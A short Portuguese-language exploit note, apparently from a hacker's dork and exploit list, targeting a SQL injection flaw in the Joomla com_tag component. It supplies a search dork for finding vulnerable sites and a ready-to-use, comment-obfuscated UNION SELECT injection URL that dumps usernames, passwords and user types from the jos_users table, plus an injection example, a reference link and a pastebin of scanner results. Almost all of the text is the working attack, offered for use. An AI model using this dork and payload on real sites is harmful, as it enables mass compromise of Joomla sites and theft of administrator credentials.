[Joomla componente]
[X] com_tag (tag_id) Vulnerável a SQL-injection
0xDORK[0]: inurl:option=com_tag
0xExploit[0]: /index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component
Exemplo:
http://WWW.URL.COM/index.php?option=com_tag
&controller=tag&task=add&article_id=1
/index.php?option=com_tag&controller=tag&task=add&article_id=-ID{vull}
Injetando:
http://
WWW.URL.COM
/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component
RESPOSTA:
REF:http://www.exploit-id.com/web-applications/joomla-component-com_tag-tag_id-sql-injection-vulnerability
ALGUNS RESULTADOS:
Usando scanner INURLBR:
REPOSITÓRIO::: http://pastebin.com/Tb0Qp0qY